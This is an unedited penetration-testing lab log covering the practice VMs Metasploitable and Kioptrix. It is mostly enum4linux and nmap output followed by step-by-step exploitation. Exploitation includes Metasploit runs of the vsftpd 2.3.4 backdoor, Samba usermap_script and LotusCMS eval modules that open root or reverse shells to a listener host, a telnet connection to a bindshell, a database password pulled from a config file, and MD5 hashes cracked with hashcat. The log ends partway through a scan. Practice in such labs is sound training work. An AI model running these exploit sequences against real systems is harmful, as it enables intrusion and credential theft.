[+] Getting builtin group memberships:

[+] Getting local groups:

[+] Getting local group memberships:

[+] Getting domain groups:

[+] Getting domain group memberships:

==========================================================================
| Users on 123.123.123.102 via RID cycling (RIDS: 500-550,1000-1050) |
==========================================================================
[I] Found new SID: S-1-5-21-1042354039-2475377354-766472396
[+] Enumerating users using SID S-1-5-21-1042354039-2475377354-766472396 and logon username '', password ''
S-1-5-21-1042354039-2475377354-766472396-500 METASPLOITABLE\Administrator (Local User)
S-1-5-21-1042354039-2475377354-766472396-501 METASPLOITABLE\nobody (Local User)
S-1-5-21-1042354039-2475377354-766472396-502 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-503 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-504 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-505 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-506 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-507 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-508 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-509 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-510 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-511 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-512 METASPLOITABLE\Domain Admins (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-513 METASPLOITABLE\Domain Users (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-514 METASPLOITABLE\Domain Guests (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-515 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-516 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-517 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-518 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-519 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-520 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-521 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-522 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-523 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-524 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-525 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-526 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-527 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-528 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-529 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-530 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-531 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-532 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-533 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-534 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-535 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-536 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-537 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-538 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-539 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-540 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-541 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-542 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-543 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-544 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-545 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-546 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-547 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-548 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-549 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-550 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-1000 METASPLOITABLE\root (Local User)
S-1-5-21-1042354039-2475377354-766472396-1001 METASPLOITABLE\root (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-1002 METASPLOITABLE\daemon (Local User)
S-1-5-21-1042354039-2475377354-766472396-1003 METASPLOITABLE\daemon (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-1004 METASPLOITABLE\bin (Local User)
S-1-5-21-1042354039-2475377354-766472396-1005 METASPLOITABLE\bin (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-1006 METASPLOITABLE\sys (Local User)
S-1-5-21-1042354039-2475377354-766472396-1007 METASPLOITABLE\sys (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-1008 METASPLOITABLE\sync (Local User)
S-1-5-21-1042354039-2475377354-766472396-1009 METASPLOITABLE\adm (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-1010 METASPLOITABLE\games (Local User)
S-1-5-21-1042354039-2475377354-766472396-1011 METASPLOITABLE\tty (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-1012 METASPLOITABLE\man (Local User)
S-1-5-21-1042354039-2475377354-766472396-1013 METASPLOITABLE\disk (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-1014 METASPLOITABLE\lp (Local User)
S-1-5-21-1042354039-2475377354-766472396-1015 METASPLOITABLE\lp (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-1016 METASPLOITABLE\mail (Local User)
S-1-5-21-1042354039-2475377354-766472396-1017 METASPLOITABLE\mail (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-1018 METASPLOITABLE\news (Local User)
S-1-5-21-1042354039-2475377354-766472396-1019 METASPLOITABLE\news (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-1020 METASPLOITABLE\uucp (Local User)
S-1-5-21-1042354039-2475377354-766472396-1021 METASPLOITABLE\uucp (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-1022 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-1023 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-1024 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-1025 METASPLOITABLE\man (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-1026 METASPLOITABLE\proxy (Local User)
S-1-5-21-1042354039-2475377354-766472396-1027 METASPLOITABLE\proxy (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-1028 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-1029 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-1030 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-1031 METASPLOITABLE\kmem (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-1032 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-1033 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-1034 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-1035 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-1036 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-1037 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-1038 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-1039 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-1040 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-1041 METASPLOITABLE\dialout (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-1042 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-1043 METASPLOITABLE\fax (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-1044 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-1045 METASPLOITABLE\voice (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-1046 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-1047 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-1048 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-1049 METASPLOITABLE\cdrom (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-1050 *unknown*\*unknown* (8)

================================================
| Getting printer info for 123.123.123.102 |
================================================
No printers returned.

enum4linux complete on Mon Oct 1 18:38:06 2018

PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 123.123.123.201
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
| 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
|_smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
| ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Issuer: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2010-03-17T14:07:45
| Not valid after: 2010-04-16T14:07:45
| MD5: dcd9 ad90 6c8f 2f73 74af 383b 2540 8828
|_SHA-1: ed09 3088 7066 03bf d5dc 2373 99b4 98da 2d4d 31c6
|_ssl-date: 2018-10-01T11:41:17+00:00; -5s from scanner time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC2_128_CBC_WITH_MD5
| SSL2_DES_192_EDE3_CBC_WITH_MD5
| SSL2_RC4_128_WITH_MD5
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
| SSL2_RC4_128_EXPORT40_WITH_MD5
|_ SSL2_DES_64_CBC_WITH_MD5
53/tcp open domain ISC BIND 9.4.2
| dns-nsid:
|_ bind.version: 9.4.2
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.2.8 (Ubuntu) DAV/2
|_http-title: Metasploitable2 - Linux
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/udp nfs
| 100005 1,2,3 37107/tcp mountd
| 100005 1,2,3 46647/udp mountd
| 100021 1,3,4 37491/tcp nlockmgr
| 100021 1,3,4 41496/udp nlockmgr
| 100024 1 36546/udp status
|_ 100024 1 36856/tcp status
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
512/tcp open exec netkit-rsh rexecd
513/tcp open login
514/tcp open tcpwrapped
1099/tcp open java-rmi Java RMI Registry
1524/tcp open shell Metasploitable root shell
2049/tcp open nfs 2-4 (RPC #100003)
2121/tcp open ftp ProFTPD 1.3.1
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
| mysql-info:
| Protocol: 10
| Version: 5.0.51a-3ubuntu5
| Thread ID: 8
| Capabilities flags: 43564
| Some Capabilities: SupportsTransactions, SwitchToSSLAfterHandshake, Speaks41ProtocolNew, SupportsCompression, Support41Auth, ConnectWithDatabase, LongColumnFlag
| Status: Autocommit
|_ Salt: loe.T=pB5"I,?78Of2g0
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
| ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Issuer: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2010-03-17T14:07:45
| Not valid after: 2010-04-16T14:07:45
| MD5: dcd9 ad90 6c8f 2f73 74af 383b 2540 8828
|_SHA-1: ed09 3088 7066 03bf d5dc 2373 99b4 98da 2d4d 31c6
|_ssl-date: 2018-10-01T11:41:18+00:00; -5s from scanner time.
5900/tcp open vnc VNC (protocol 3.3)
| vnc-info:
| Protocol version: 3.3
| Security types:
|_ VNC Authentication (2)
6000/tcp open X11 (access denied)
6667/tcp open irc UnrealIRCd
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
|_ajp-methods: Failed to get a valid response for the OPTION request
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/5.5
MAC Address: 00:0C:29:C3:07:99 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Uptime guess: 0.003 days (since Mon Oct 1 18:36:30 2018)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=208 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Hosts: metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -5s, deviation: 0s, median: -5s
| nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user: , NetBIOS MAC: (unknown)
| Names:
| METASPLOITABLE<00> Flags:
| METASPLOITABLE<03> Flags:
| METASPLOITABLE<20> Flags:
| \x01\x02__MSBROWSE__\x02<01> Flags:
| WORKGROUP<00> Flags:
| WORKGROUP<1d> Flags:
|_ WORKGROUP<1e> Flags:
| smb-os-discovery:
| OS: Unix (Samba 3.0.20-Debian)
| NetBIOS computer name:
| Workgroup: WORKGROUP\x00
|_ System time: 2018-10-01T07:41:16-04:00
|_smb2-time: Protocol negotiation failed (SMB2)

# Options 1

1524/tcp open shell Metasploitable root shell

telnet 123.123.123.102 1524

root@KaliLNX:~# telnet 123.123.123.102 1524
Trying 123.123.123.102...
Connected to 123.123.123.102.
Escape character is '^]'.
root@metasploitable:/#
root@metasploitable:/# root@metasploitable:/#
root@metasploitable:/# root@metasploitable:/# id
uid=0(root) gid=0(root) groups=0(root)

# Option 2
Let go with: vsFTPd 2.3.4 - secure, fast, stable

oot@KaliLNX:~# searchsploit ftp |grep 2.3.4
Cat Soft Serv-U FTP Server 2.5.x - Brute Force | windows/remote/20334.java
vsftpd 2.3.4 - Backdoor Command Execution (Metasploit) | unix/remote/17491.rb

msfconsole
msf > use exploit/unix/ftp/vsftpd_234_backdoor
msf exploit(vsftpd_234_backdoor) > show options

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 21 yes The target port (TCP)

Exploit target:

Id Name
-- ----
0 Automatic

msf exploit(vsftpd_234_backdoor) > set RHOST 123.123.123.102
RHOST => 123.123.123.102
msf exploit(vsftpd_234_backdoor) > exploit

[*] 123.123.123.102:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 123.123.123.102:21 - USER: 331 Please specify the password.
[+] 123.123.123.102:21 - Backdoor service has been spawned, handling...
[+] 123.123.123.102:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened (123.123.123.201:41237 -> 123.123.123.102:6200) at 2018-10-01 18:59:58 +0700

id
uid=0(root) gid=0(root)
pwd
/

Metasploitable

netdiscover -r 123.123.123.0/24

123.123.123.103 00:0c:29:39:38:13 1 60 VMware, Inc.

PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.1
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
| 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
|_smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
| ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Issuer: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2010-03-17T14:07:45
| Not valid after: 2010-04-16T14:07:45
| MD5: dcd9 ad90 6c8f 2f73 74af 383b 2540 8828
|_SHA-1: ed09 3088 7066 03bf d5dc 2373 99b4 98da 2d4d 31c6
|_ssl-date: 2018-10-01T12:20:39+00:00; 0s from scanner time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_DES_192_EDE3_CBC_WITH_MD5
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
| SSL2_DES_64_CBC_WITH_MD5
| SSL2_RC4_128_EXPORT40_WITH_MD5
| SSL2_RC4_128_WITH_MD5
|_ SSL2_RC2_128_CBC_WITH_MD5
53/tcp open domain ISC BIND 9.4.2
| dns-nsid:
|_ bind.version: 9.4.2
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch)
| http-methods:
| Supported Methods: GET HEAD POST OPTIONS TRACE
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch
|_http-title: Site doesn't have a title (text/html).
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
| mysql-info:
| Protocol: 10
| Version: 5.0.51a-3ubuntu5
| Thread ID: 8
| Capabilities flags: 43564
| Some Capabilities: LongColumnFlag, Support41Auth, SwitchToSSLAfterHandshake, ConnectWithDatabase, SupportsTransactions, Speaks41ProtocolNew, SupportsCompression
| Status: Autocommit
|_ Salt: ADo&klY\?hle7~:E,Lw3
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
| ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Issuer: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2010-03-17T14:07:45
| Not valid after: 2010-04-16T14:07:45
| MD5: dcd9 ad90 6c8f 2f73 74af 383b 2540 8828
|_SHA-1: ed09 3088 7066 03bf d5dc 2373 99b4 98da 2d4d 31c6
|_ssl-date: 2018-10-01T12:20:39+00:00; 0s from scanner time.
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
|_ajp-methods: Failed to get a valid response for the OPTION request
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/5.5
MAC Address: 00:0C:29:39:38:13 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Uptime guess: 497.101 days (since Mon May 22 16:55:07 2017)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=205 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Host: metasploitable.localdomain; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user: , NetBIOS MAC: (unknown)
| Names:
| METASPLOITABLE<00> Flags:
| METASPLOITABLE<03> Flags:
| METASPLOITABLE<20> Flags:
| WORKGROUP<00> Flags:
|_ WORKGROUP<1e> Flags:
| smb-os-discovery:
| OS: Unix (Samba 3.0.20-Debian)
| NetBIOS computer name:
| Workgroup: WORKGROUP\x00
|_ System time: 2018-10-01T08:20:39-04:00
|_smb2-time: Protocol negotiation failed (SMB2)

msf > use exploit/multi/samba/usermap_script
msf exploit(usermap_script) > show options

Module options (exploit/multi/samba/usermap_script):

Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 139 yes The target port (TCP)

Exploit target:

Id Name
-- ----
0 Automatic

msf exploit(usermap_script) > set rhost 123.123.123.103
rhost => 123.123.123.103
msf exploit(usermap_script) > show options

Module options (exploit/multi/samba/usermap_script):

Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 123.123.123.103 yes The target address
RPORT 139 yes The target port (TCP)

Exploit target:

Id Name
-- ----
0 Automatic

msf exploit(usermap_script) > exploit

[*] Started reverse TCP double handler on 123.123.123.201:4444
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo iCv04GP8AJIvKlab;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "iCv04GP8AJIvKlab\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (123.123.123.201:4444 -> 123.123.123.103:50489) at 2018-10-01 19:35:12 +0700

id
uid=0(root) gid=0(root)

Kioptrix Level 3

Kioptrix Level 2

netdiscover -r 123.123.123.0/24
123.123.123.107 00:0c:29:d7:ef:9f 1 60 VMware, Inc.

nmap -T4 -A -v 123.123.123.107
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey:
| 1024 30:e3:f6:dc:2e:22:5d:17:ac:46:02:39:ad:71:cb:49 (DSA)
|_ 2048 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA)
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-favicon: Unknown favicon MD5: 99EFC00391F142252888403BB1C196D2
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Ligoat Security - Got Goat? Security ...
MAC Address: 00:0C:29:D7:EF:9F (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Uptime guess: 0.002 days (since Wed Oct 3 18:02:38 2018)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=207 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

http://123.123.123.107/

msf > search lotuscms

Matching Modules
================

Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/multi/http/lcms_php_exec 2011-03-03 excellent LotusCMS 3.0 eval() Remote Command Execution

msf >

msf > use exploit/multi/http/lcms_php_exec
msf exploit(lcms_php_exec) > show options

Module options (exploit/multi/http/lcms_php_exec):

Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOST yes The target address
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
URI /lcms/ yes URI
VHOST no HTTP server virtual host

Exploit target:

Id Name
-- ----
0 Automatic LotusCMS 3.0

msf exploit(lcms_php_exec) >

msf exploit(lcms_php_exec) > set rhost 123.123.123.107
rhost => 123.123.123.107
msf exploit(lcms_php_exec) > set payload generic/shell_reverse_tcp
payload => generic/shell_reverse_tcp
msf exploit(lcms_php_exec) > set lhost 123.123.123.201
lhost => 123.123.123.201
msf exploit(lcms_php_exec) > set URI /
URI => /

msf exploit(lcms_php_exec) > show options

Module options (exploit/multi/http/lcms_php_exec):

Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOST 123.123.123.107 yes The target address
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
URI / yes URI
VHOST no HTTP server virtual host

Payload options (generic/shell_reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 123.123.123.201 yes The listen address
LPORT 4444 yes The listen port

Exploit target:

Id Name
-- ----
0 Automatic LotusCMS 3.0

msf exploit(lcms_php_exec) > exploit

[*] Started reverse TCP handler on 123.123.123.201:4444
[*] Using found page param: /index.php?page=index
[*] Sending exploit ...
[*] Command shell session 1 opened (123.123.123.201:4444 -> 123.123.123.107:57090) at 2018-10-03 23:37:34 +0700

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

echo "import pty; pty.spawn('/bin/bash')" > /tmp/vnkk.py
python /tmp/vnkk.py
www-data@Kioptrix3:/home/www/kioptrix3.com$

www-data@Kioptrix3:/home/www/kioptrix3.com$

www-data@Kioptrix3:/home/www/kioptrix3.com/gallery$ cat /home/www/kioptrix3.com/gallery/gconfig.php
error_reporting(0);
/*
A sample Gallarific configuration file. You should edit
the installer details below and save this file as gconfig.php
Do not modify anything else if you don't know what it is.
*/

// Installer Details -----------------------------------------------

// Enter the full HTTP path to your Gallarific folder below,
// such as http://www.yoursite.com/gallery
// Do NOT include a trailing forward slash

$GLOBALS["gallarific_path"] = "http://kioptrix3.com/gallery";

$GLOBALS["gallarific_mysql_server"] = "localhost";
$GLOBALS["gallarific_mysql_database"] = "gallery";
$GLOBALS["gallarific_mysql_username"] = "root";
$GLOBALS["gallarific_mysql_password"] = "fuckeyou";

// Setting Details -------------------------------------------------

if(!$g_mysql_c = @mysql_connect($GLOBALS["gallarific_mysql_server"], $GLOBALS["gallarific_mysql_username"], $GLOBALS["gallarific_mysql_password"])) {
echo("A connection to the database couldn't be established: " . mysql_error());
die();
}else {
if(!$g_mysql_d = @mysql_select_db($GLOBALS["gallarific_mysql_database"], $g_mysql_c)) {
echo("The Gallarific database couldn't be opened: " . mysql_error());
die();
}else {
$settings=mysql_query("select * from gallarific_settings");
if(mysql_num_rows($settings)!=0){
while($data=mysql_fetch_array($settings)){
$GLOBALS["{$data['settings_name']}"]=$data['settings_value'];
}
}

}
}

?>
www-data@Kioptrix3:/home/www/kioptrix3.com/gallery$

http://123.123.123.107/phpmyadmin/
User: root
Password: fuckeyou

1 dreg 0d3eccfb887aabd50f243b3f155c0f85

2 loneferret 5badcaf789d3d1d09794d8f021f40f0e

vim md5.txt
0d3eccfb887aabd50f243b3f155c0f85
5badcaf789d3d1d09794d8f021f40f0e
hashcat -m 0 md5.txt /usr/share/wordlists/rockyou.txt

5badcaf789d3d1d09794d8f021f40f0e:starwars

0d3eccfb887aabd50f243b3f155c0f85:Mast3r

Kioptrix Level 2

Kioptrix Level 2
netdiscover -r 123.123.123.0/24

123.123.123.101 00:0c:29:9c:4b:ac 1 60 VMware, Inc.

nmap -T4 -A -v 123.123.123.101

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99)
| ssh-hostkey:
| 1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1)
| 1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA)
|_ 1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA)
|_sshv1: Server supports SSHv1
80/tcp open http Apache httpd 2.0.52 ((CentOS))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100024 1 655/udp status
|_ 100024 1 658/tcp status
443/tcp open ssl/http Apache httpd 2.0.52 ((CentOS))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Issuer: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: md5WithRSAEncryption
| Not valid before: 2009-10-08T00:10:47
| Not valid after: 2010-10-08T00:10:47
| MD5: 01de 29f9 fbfb 2eb2 beaf e624 3157 090f
